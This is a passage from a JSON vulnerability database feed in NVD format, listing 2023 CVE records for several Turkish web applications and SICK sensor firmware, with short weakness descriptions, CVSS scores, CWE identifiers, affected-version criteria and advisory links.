1.3."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":3.6},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":3.6}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-552"}]},{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"CWE-552"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:saysis:starcities:*:*:*:*:*:*:*:*","versionEndIncluding":"1.3","matchCriteriaId":"3FCCB7DB-20F6-4DB0-AF7A-C6A5A28C364E"}]}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-23-0140","source":"ilet
isim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0140","source":"iletisim@usom.gov.tr","tags":["Third Party Advisory"]},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0140","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Third Party Advisory"]}]}},{"cve":{"id":"CVE-2023-0322","sourceIdentifier":"iletisim@usom.gov.tr","published":"2023-03-15T12:15:10.007","lastModified":"2026-06-01T13:16:19.360","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Talent Software UNIS allows Reflected XSS.\n\nThis issue affects UNIS: before 28376."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","baseScore":6.1,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":2.7},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","baseScore":6.1,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":2.7}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-79"}]},{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"CWE-79"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:talentyazilim:unis:*:*:*:*:*:*:*:*","versionEndExcluding":"28376","matchCriteriaId":"ACFE0227-4ED1-46E2
-8B33-34F003250664"}]}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-23-0147","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0147","source":"iletisim@usom.gov.tr","tags":["Third Party Advisory","US Government Resource"]},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0147","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Third Party Advisory","US Government Resource"]}]}},{"cve":{"id":"CVE-2023-1152","sourceIdentifier":"iletisim@usom.gov.tr","published":"2023-03-17T09:15:12.533","lastModified":"2026-06-01T13:16:21.280","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Utarit Information Technologies Persolus allows SQL Injection. This issue affects Persolus: before 2.03.93."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9},{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":
"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-89"}]},{"source":"nvd@nist.gov","type":"Secondary","description":[{"lang":"en","value":"CWE-89"}]},{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","description":[{"lang":"en","value":"CWE-89"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:utarit:persolus:*:*:*:*:*:*:*:*","versionEndExcluding":"2.03.93","matchCriteriaId":"006D7605-817A-4E41-A8AF-AF2DD1CCFB46"}]}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-23-0154-2","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0154-2","source":"iletisim@usom.gov.tr","tags":["Third Party Advisory"]},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0154-2","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Third Party Advisory"]}]}},{"cve":{"id":"CVE-2023-0320","sourceIdentifier":"iletisim@usom.gov.tr","published":"2023-03-20T13:15:11.693","lastModified":"2026-06-01T13:16:18.223","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Izmir Katip Celebi University UBYS allows Stored XSS.\n\nThis issue affects UBYS: before 
23.03.16."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N","baseScore":5.4,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.3,"impactScore":2.7},{"source":"nvd@nist.gov","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N","baseScore":5.4,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.3,"impactScore":2.7}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-79"}]},{"source":"nvd@nist.gov","type":"Secondary","description":[{"lang":"en","value":"CWE-79"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:university_information_management_system_project:university_information_management_system:*:*:*:*:*:*:*:*","versionEndExcluding":"23.03.16","matchCriteriaId":"82D43CAB-4461-4678-905B-B862DA779292"}]}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-23-0159","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0159","source":"iletisim@usom.gov.tr","tags":["Third Party Advisory"]},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0159","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Third Party 
Advisory"]}]}},{"cve":{"id":"CVE-2023-1462","sourceIdentifier":"iletisim@usom.gov.tr","published":"2023-03-21T09:15:10.497","lastModified":"2026-06-01T13:16:22.353","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Authorization Bypass Through User-Controlled Key vulnerability in Vadi Corporate Information Systems DigiKent allows Authentication Bypass, Authentication Abuse. This issue affects DigiKent: before 23.03.20."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H","baseScore":8.8,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":2.8,"impactScore":5.9},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H","baseScore":8.8,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":2.8,"impactScore":5.9}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-639"}]},{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"CWE-639"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:vadi:digikent:*:*:*:*:*:*:*:*","versionEndExcluding":"23.03.20","matchCriteriaId":"02BD5BAD-8FAD-4402-A594-EAB89DF78A96"}]}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-23-0161","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0161","source":"iletisim@usom.gov.tr","tags":["
Third Party Advisory"]},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0161","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Third Party Advisory"]}]}},{"cve":{"id":"CVE-2023-1153","sourceIdentifier":"iletisim@usom.gov.tr","published":"2023-03-21T12:15:10.117","lastModified":"2026-06-01T13:16:21.487","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Pacsrapor allows SQL Injection, Command Line Execution through SQL Injection.\n\nThis issue affects Pacsrapor: before 1.22."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-89"}]},{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"CWE-89"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:pacsrapor:pacsrapor:*:*:*:*:*:*:*:*","versionEndExcluding":"1.22","matchCriteriaId":"F9D6E36C-D132-41AF-AB5B-067EC31D7E88"}]}]}],"references":[{"url":"https://siberguvenlik.
gov.tr/guvenlik-bildirimleri/detay/tr-23-0163","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0163","source":"iletisim@usom.gov.tr","tags":["Third Party Advisory"]},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0163","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Third Party Advisory"]}]}},{"cve":{"id":"CVE-2023-1154","sourceIdentifier":"iletisim@usom.gov.tr","published":"2023-03-21T12:15:10.407","lastModified":"2026-06-01T13:16:21.620","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Pacsrapor allows Reflected XSS.\n\nThis issue affects Pacsrapor: before 1.22."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","baseScore":6.1,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":2.7},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","baseScore":6.1,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":2.7}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-79"}]},{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"CWE-79"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:pacsrapor:pacsrapor:*:*:*:*:*:*:*:*","versionEndE
xcluding":"1.22","matchCriteriaId":"F9D6E36C-D132-41AF-AB5B-067EC31D7E88"}]}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-23-0163","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0163","source":"iletisim@usom.gov.tr","tags":["Third Party Advisory"]},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0163","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Third Party Advisory"]}]}},{"cve":{"id":"CVE-2023-1050","sourceIdentifier":"iletisim@usom.gov.tr","published":"2023-03-23T07:15:11.880","lastModified":"2026-06-01T13:16:20.540","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in As Koc Energy Web Report System allows SQL Injection.\n\nThis issue affects Web Report System: before 23.03.10."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","baseScore":9.8,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"HIGH","availabilityImpact":"HIGH"},"exploitabilityScore":3.9,"impactScore":5.9}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-89"}]},{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"CWE-89"}]}],
"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:askoc:web_report_system:*:*:*:*:*:*:*:*","versionEndExcluding":"23.03.10","matchCriteriaId":"703BE6D4-079F-4D39-BDF0-E25734DB5100"}]}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-23-0166","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0166","source":"iletisim@usom.gov.tr","tags":["Third Party Advisory"]},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0166","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Third Party Advisory"]}]}},{"cve":{"id":"CVE-2023-1051","sourceIdentifier":"iletisim@usom.gov.tr","published":"2023-03-23T07:15:12.787","lastModified":"2026-06-01T13:16:20.670","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in As Koc Energy Web Report System allows Reflected XSS.\n\nThis issue affects Web Report System: before 
23.03.10."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","baseScore":6.1,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":2.7},{"source":"nvd@nist.gov","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","baseScore":6.1,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":2.7}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-79"}]},{"source":"nvd@nist.gov","type":"Secondary","description":[{"lang":"en","value":"CWE-79"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:askoc:web_report_system:*:*:*:*:*:*:*:*","versionEndExcluding":"23.03.10","matchCriteriaId":"703BE6D4-079F-4D39-BDF0-E25734DB5100"}]}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-23-0166","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0166","source":"iletisim@usom.gov.tr","tags":["Third Party Advisory"]},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0166","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Third Party Advisory"]}]}},{"cve":{"id":"CVE-2023-1013","sourceIdentifier":"iletisim@usom.gov.tr","published":"2023-03-30T09:15:10.317","lastModified":"2026-06-01T13:16:20.293","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Neutralization of 
Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in Virames Vira-Investing allows Cross-Site Scripting (XSS).\n\nThis issue affects Vira-Investing: before 1.0.84.86."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","baseScore":6.1,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":2.7}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-80"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:dizayn:vira-investing:*:*:*:*:*:*:*:*","versionEndExcluding":"1.0.84.86","matchCriteriaId":"92C947C7-4AE8-40D8-BCA9-992CAE070BAE"}]}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-23-0183","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0183","source":"iletisim@usom.gov.tr","tags":["Third Party Advisory"]},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0183","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Third Party Advisory"]}]}},{"cve":{"id":"CVE-2023-1014","sourceIdentifier":"iletisim@usom.gov.tr","published":"2023-03-30T09:15:10.440","lastModified":"2026-06-01T13:16:20.427","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Protection for Outbound Error Messages and Alert Signals vulnerability in Virames Vira-Investing allows Account Footprinting.\n\nThis issue affects Vira-Investing: before 
1.0.84.86."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":3.6},{"source":"nvd@nist.gov","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":3.6}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-1320"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:dizayn:vira-investing:*:*:*:*:*:*:*:*","versionEndExcluding":"1.0.84.86","matchCriteriaId":"92C947C7-4AE8-40D8-BCA9-992CAE070BAE"}]}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-23-0183","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0183","source":"iletisim@usom.gov.tr","tags":["Third Party Advisory"]},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0183","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Third Party Advisory"]}]}},{"cve":{"id":"CVE-2023-1060","sourceIdentifier":"iletisim@usom.gov.tr","published":"2023-03-31T10:15:06.660","lastModified":"2026-06-01T13:16:20.790","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in YKM YKM CRM allows 
Reflected XSS.\n\nThis issue affects YKM CRM: before 23.03.30."}],"metrics":{"cvssMetricV31":[{"source":"iletisim@usom.gov.tr","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","baseScore":6.1,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":2.7}]},"weaknesses":[{"source":"iletisim@usom.gov.tr","type":"Secondary","description":[{"lang":"en","value":"CWE-79"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:ykmbilisim:ykm_crm:*:*:*:*:*:*:*:*","versionEndExcluding":"23.03.30","matchCriteriaId":"310BEB7A-1613-4463-B4A8-E8EB23698BFD"}]}]}],"references":[{"url":"https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-23-0189","source":"iletisim@usom.gov.tr"},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0189","source":"iletisim@usom.gov.tr","tags":["Third Party Advisory"]},{"url":"https://www.usom.gov.tr/bildirim/tr-23-0189","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Third Party Advisory"]}]}},{"cve":{"id":"CVE-2023-23445","sourceIdentifier":"psirt@sick.de","published":"2023-05-15T11:15:09.087","lastModified":"2026-06-01T13:16:22.717","vulnStatus":"Modified","cveTags":[],"descriptions":[{"lang":"en","value":"Improper Access Control in SICK FTMg AIR FLOW SENSOR with Partnumbers\n1100214, 1100215, 1100216, 1120114, 1120116, 1122524, 1122526 allows an unprivileged remote\nattacker to gain unauthorized access to data fields by using a therefore unpriviledged account via the\nREST 
interface."}],"metrics":{"cvssMetricV31":[{"source":"psirt@sick.de","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":3.6},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N","baseScore":7.5,"baseSeverity":"HIGH","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":3.6}]},"weaknesses":[{"source":"psirt@sick.de","type":"Secondary","description":[{"lang":"en","value":"CWE-284"}]},{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"CWE-863"}]}],"configurations":[{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esd20axx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"E3882685-8678-47E4-995C-C3F6D9AD5668"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esd20axx:-:*:*:*:*:*:*:*","matchCriteriaId":"16AD808F-900B-41EE-B90A-F9D67AAAD6BE"}]}]},{"operator":"AND","nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:o:sick:ftmg-esd25axx_firmware:*:*:*:*:*:*:*:*","versionEndExcluding":"2.0","matchCriteriaId":"49D930E8-415C-4183-87A1-8D7F44247B67"}]},{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":false,"criteria":"cpe:2.3:h:sick:ftmg-esd25axx:-:*:*:*:*:*:*:*","matchCriteriaId":"24618A95-328C-47C9-B8EF-B4DF6E65D68E"}]}]},{"operator":"AND","nodes":[{"op
